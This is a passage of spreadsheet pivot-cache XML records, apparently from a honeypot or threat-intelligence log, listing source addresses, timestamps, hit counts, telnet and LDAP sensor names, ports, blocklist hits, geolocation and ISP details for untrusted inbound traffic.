    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cd:9ea6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3074"/>
    <x v="3074"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T01:23:22"/>
    <d v="2025-04-05T01:23:22"/>
    <d v="2025-04-05T01:23:22"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Ajmer"/>
    <s v="Ajmer"/>
    <s v="1279159"/>
    <s v="305001"/>
    <s v="26.4499"/>
    <s v="74.6399"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:2d32"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3075"/>
    <x v="3075"/>
    <s v="125-229-240-136.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T01:01:13"/>
    <d v="2024-12-25T22:29:41"/>
    <d v="2025-04-05T01:01:13"/>
    <n v="302"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H8"/>
    <s v="23&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NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:f088"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3076"/>
    <x v="3076"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T00:59:00"/>
    <d v="2025-04-05T00:57:56"/>
    <d v="2025-04-05T00:59:00"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_LDAP_HC1"/>
    <s v="389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="MX"/>
    <s v="Mexico"/>
    <s v="TAB"/>
    <s v="Tabasco"/>
    <s v="Emiliano Zapata"/>
    <s v="Emiliano Zapata"/>
    <s v="3527880"/>
    <s v="NA"/>
    <s v="17.7406"/>
    <s v="-91.7663"/>
    <s v="8151"/>
    <s v="Uninet S.A. de C.V."/>
    <s v="Uninet S.A. de C.V."/>
    <s v="residential"/>
    <s v="UNINET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bbe5:51f7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3077"/>
    <x v="3077"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T00:57:40"/>
    <d v="2025-04-05T00:57:40"/>
    <d v="2025-04-05T00:57:40"/>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d6:4d66"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3078"/>
    <x v="3078"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T00:26:25"/>
    <d v="2025-04-01T22:58:40"/>
    <d v="2025-04-05T00:26:25"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="WI"/>
    <s v="Wisconsin"/>
    <s v="Sheboygan"/>
    <s v="Adell"/>
    <s v="5243587"/>
    <s v="53001"/>
    <s v="43.5483"/>
    <s v="-87.9424"/>
    <s v="36001"/>
    <s v="Bertram Communications LLC"/>
    <s v="Bertram Communications LLC"/>
    <s v="business"/>
    <s v="Bertram Communications LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d167:fe2e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3079"/>
    <x v="3079"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T00:25:53"/>
    <d v="2025-04-05T00:25:53"/>
    <d v="2025-04-05T00:25:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="NA"/>
    <s v="21.1959"/>
    <s v="72.8302"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:9719"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3080"/>
    <x v="3080"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T00:24:44"/>
    <d v="2025-04-04T22:23:13"/>
    <d v="2025-04-05T00:24:44"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c3:e416"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3081"/>
    <x v="3081"/>
    <s v="NA&amp;&amp;c-69-250-159-104.hsd1.va.comcast.net"/>
    <x v="0"/>
    <d v="2025-04-05T00:14:58"/>
    <d v="2025-04-04T19:22:10"/>
    <d v="2025-04-05T00:14:58"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="VA"/>
    <s v="Virginia"/>
    <s v="Prince William"/>
    <s v="Dale City"/>
    <s v="4755158"/>
    <s v="NA"/>
    <s v="38.6371"/>
    <s v="-77.3111"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast Cable Communications, Inc"/>
    <s v="2004-02-11"/>
    <s v="JUMPSTART-4"/>
    <s v="2021-01-25"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:45fa:9f68"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3082"/>
    <x v="3082"/>
    <s v="p12763153-ipxg45601marunouchi.tokyo.ocn.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-04T23:22:16"/>
    <d v="2025-04-04T20:12:17"/>
    <d v="2025-04-04T23:22:16"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'cbl.abuseat.org': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda (Marunouchi)"/>
    <s v="11749713"/>
    <s v="100-0000"/>
    <s v="35.6804"/>
    <s v="139.766"/>
    <s v="4713"/>
    <s v="NTT Communications Corporation"/>
    <s v="NTT Communications Corporation"/>
    <s v="business"/>
    <s v="Open Computer Network"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:99a6:2b99"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3083"/>
    <x v="3083"/>
    <s v="NA&amp;&amp;p4fd167be.dip0.t-ipconnect.de"/>
    <x v="0"/>
    <d v="2025-04-04T23:18:59"/>
    <d v="2025-04-04T23:01:25"/>
    <d v="2025-04-04T23:18:59"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="abuseipdb&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="NA&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="3320"/>
    <s v="Deutsche Telekom AG"/>
    <s v="Deutsche Telekom AG"/>
    <s v="residential"/>
    <s v="Deutsche Telekom AG"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2023-04-24 13:53:29"/>
    <s v="['dns00.dns.t-ipnet.de', 'dns02.dns.t-ipnet.de', 'dns20.dns.t-ipnet.de', 'dns50.dns.t-ipnet.de', 'pns.dtag.de']"/>
    <s v="NA"/>
    <s v="connect"/>
    <s v="None"/>
    <x v="1"/>
    <s v="None"/>
    <s v="None"/>
    <s v="::ffff:4fd1:67be"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3084"/>
    <x v="3084"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T23:15:58"/>
    <d v="2025-04-04T23:15:58"/>
    <d v="2025-04-04T23:15:58"/>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1:33e7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3085"/>
    <x v="3085"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T23:11:59"/>
    <d v="2025-04-04T23:11:59"/>
    <d v="2025-04-04T23:11:59"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7449:dc0c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3086"/>
    <x v="3086"/>
    <s v="NA&amp;&amp;122-116-244-47.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T23:01:01"/>
    <d v="2025-01-21T09:18:15"/>
    <d v="2025-04-04T23:01:01"/>
    <n v="468"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="23&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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a74:f42f"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3087"/>
    <x v="3087"/>
    <s v="NA&amp;&amp;220-135-213-213.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-04T23:00:57"/>
    <d v="2024-09-08T21:17:00"/>
    <d v="2025-04-04T23:00:57"/>
    <n v="312"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;161&amp;&amp;23&amp;&amp;9100&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taoyuan"/>
    <s v="Taoyuan"/>
    <s v="6696918"/>
    <s v="NA"/>
    <s v="24.9937"/>
    <s v="121.297"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc87:d5d5"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3088"/>
    <x v="3088"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T22:59:27"/>
    <d v="2025-04-04T22:59:27"/>
    <d v="2025-04-04T22:59:27"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="3320"/>
    <s v="DTAG"/>
    <s v="Deutsche Telekom AG"/>
    <s v="consumer"/>
    <s v="Deutsche Telekom AG"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5491:431c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3089"/>
    <x v="3089"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T22:53:14"/>
    <d v="2025-04-04T22:53:14"/>
    <d v="2025-04-04T22:53:14"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb6:8fa9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3090"/>
    <x v="3090"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T22:43:51"/>
    <d v="2025-04-04T22:43:51"/>
    <d v="2025-04-04T22:43:51"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="corporate"/>
    <s v="BSNL GSM EastZone"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b62:1a4a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3091"/>
    <x v="3091"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T22:27:58"/>
    <d v="2025-03-19T09:09:24"/>
    <d v="2025-04-04T22:27:58"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0798"/>
    <s v="121.571"/>
    <s v="24163"/>
    <s v="UNION BROADBAND NETWORK"/>
    <s v="UBBNET"/>
    <s v="residential"/>
    <s v="Union Cable TV Co., ltd."/>
    <s v="None"/>
    <s v="ELANET-NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d3d:daeb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3092"/>
    <x v="3092"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-04T22:27:08"/>
    <d v="2025-04-04T22:27:08"/>
    <d v="2025-04-04T22:27:08"/>
